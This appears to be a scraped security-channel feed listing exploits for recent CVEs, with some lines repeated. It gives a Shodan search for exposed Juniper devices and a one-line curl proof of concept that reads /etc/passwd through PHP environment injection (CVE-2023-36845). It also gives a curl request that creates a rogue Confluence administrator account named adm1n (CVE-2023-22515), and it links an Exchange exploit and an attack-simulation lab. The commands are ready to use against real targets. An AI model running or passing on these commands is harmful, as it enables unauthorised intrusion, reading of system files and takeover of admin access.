Juniper - Remote Code Execution ( CVE-2023-36845 )
Shodan Dork : noscript:"Juniper" http.favicon.hash:2141724739
Poc: curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0'
Shodan Dork : noscript:"Juniper" http.favicon.hash:2141724739
Poc: curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0'
CVE-2023-22515
Confluence Data Center and Server - Broken Access Control Vulnerability
POC:
login - adm1n/adm1n
Confluence Data Center and Server - Broken Access Control Vulnerability
POC:
curl -k -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=adm1n&fullName=admin&email=admin@confluence&password=adm1n&confirm=adm1n&setup-next-button=Next" http://confluence/setup/setupadministrator.action login - adm1n/adm1n
https://securityonline.info/microsoft-exchange-server-rce-cve-2023-36745-flaw-gets-poc-exploit/
https://github.com/N1k0la-T/CVE-2023-36745
https://github.com/N1k0la-T/CVE-2023-36745
Daily CyberSecurity
Microsoft Exchange Server RCE (CVE-2023-36745) Flaw Gets PoC Exploit
Proof-of-concept (PoC) exploit code has been published for a Microsoft Exchange Server vulnerability tracked as CVE-2023-36745
An automated Breach and Attack Simulation lab with terraform. Built for IaC stability, consistency, and speed.
https://github.com/iknowjason/AutomatedEmulation
https://github.com/iknowjason/AutomatedEmulation
GitHub
GitHub - iknowjason/AutomatedEmulation: An automated Breach and Attack Simulation lab with terraform. Built for IaC stability…
An automated Breach and Attack Simulation lab with terraform. Built for IaC stability, consistency, and speed. - iknowjason/AutomatedEmulation